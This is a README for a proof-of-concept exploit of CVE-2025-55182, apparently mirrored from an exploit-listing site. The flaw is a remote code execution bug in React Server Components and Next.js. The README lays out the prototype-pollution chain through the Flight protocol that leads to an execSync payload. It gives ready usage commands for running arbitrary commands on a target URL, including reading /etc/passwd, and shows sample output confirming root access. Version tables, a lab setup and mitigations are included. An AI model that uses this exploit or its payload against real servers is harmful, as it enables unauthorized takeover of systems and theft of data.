Share
## https://sploitus.com/exploit?id=8783BCD9-1D16-5492-8765-013BB8C90447
# CVE-2025-55182 - React Server Components RCE PoC

**Author:** rl0x01

## Description

**CVE-2025-55182** is a critical (CVSS 10.0) **Remote Code Execution (RCE)** vulnerability affecting React Server Components via the Flight protocol.

### Vulnerable Versions

| Next.js | React |
|---------|-------|
| 14.3.0-canary.77 to 15.0.4 | 19.0.0 |
| 15.1.1-canary.0 to 15.1.8 | 19.1.0 |
| 15.2.0-canary.0 to 15.2.5 | 19.1.1 |
| 15.3.0-canary.0 to 15.3.5 | 19.2.0 |
| 15.4.0-canary.0 to 15.4.7 | |
| 15.5.1-canary.0 to 15.5.6 | |
| **16.0.0-canary.0 to 16.0.6** | |

### Fixed Versions

| Next.js |
|---------|
| 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, **16.0.7+** |

## Exploitation Mechanism

1. Uses `$@` to get a raw `Chunk` reference
2. Overwrites `.then` with `Chunk.prototype.then` via `$1:__proto__:then`
3. Sets `status` to `resolved_model` to trigger `initializeModelChunk`
4. Uses `$B1337` to trigger Blob deserialization
5. Points `_formData.get` to `Function` constructor
6. `_prefix` contains the JS code to execute

The code is evaluated via:
```javascript
Function("throw new Error(require('child_process').execSync('COMMAND').toString());//1337")
```

## Installation

```bash
pip install -r requirements.txt
```

## Usage

### Check if target is vulnerable

```bash
python cve_2025_55182_poc.py https://target.com --check-only
```

### Execute a command

```bash
# Default command (id)
python cve_2025_55182_poc.py https://target.com

# Custom command
python cve_2025_55182_poc.py https://target.com -c "whoami"
python cve_2025_55182_poc.py https://target.com -c "cat /etc/passwd"
python cve_2025_55182_poc.py https://target.com -c "dir C:\\"
```

### Options

| Option | Description |
|--------|-------------|
| `url` | Target URL (required) |
| `-c, --command` | Command to execute (default: `id`) |
| `--check-only` | Only check vulnerability |
| `-t, --timeout` | Timeout in seconds (default: 15) |
| `-v, --verbose` | Verbose output |
| `--raw` | Show raw response |

## Vulnerable Test Lab

```bash
cd vulnerable-app
npm install
npm run dev
# Server at http://localhost:3000
```

## Example Output

```
+======================================================================+
|  CVE-2025-55182 - React Server Components RCE                     |
|  React Flight Protocol Deserialization Vulnerability               |
+======================================================================+
[*] Affected: React 19.0.0-19.2.0 / Next.js 14.3-16.0.6
[*] CVSS Score: 10.0 (CRITICAL)
[*] Author: rl0x01

[*] Target: http://localhost:3000
[*] Timeout: 15s

[1/2] Checking vulnerability...
[+] VULNERABLE! RCE Confirmed - Output received

[2/2] Executing command: whoami
[+] Payload sent!

============================================================
RESULT: whoami
============================================================
root
============================================================
```

## Project Structure

```
CVE-2025-55182/
โ”œโ”€โ”€ cve_2025_55182_poc.py    # Main exploit script
โ”œโ”€โ”€ requirements.txt          # Python dependencies
โ”œโ”€โ”€ README.md                 # Documentation
โ””โ”€โ”€ vulnerable-app/           # Vulnerable Next.js app for testing
    โ”œโ”€โ”€ package.json
    โ”œโ”€โ”€ next.config.js
    โ””โ”€โ”€ app/
        โ”œโ”€โ”€ layout.js
        โ”œโ”€โ”€ page.js
        โ””โ”€โ”€ actions.js
```

## Disclaimer

โš ๏ธ **This tool is provided for educational and authorized security testing purposes only.**

Unauthorized use of this tool against systems you do not own or have explicit permission to test is illegal.

## Mitigation

1. **Update Next.js** to 15.0.5+, 15.1.9+, 15.2.6+, 15.3.6+, 15.4.8+, 15.5.7+, or 16.0.7+
2. **Update React** to a patched version
3. Implement WAF rules to block malicious Flight protocol payloads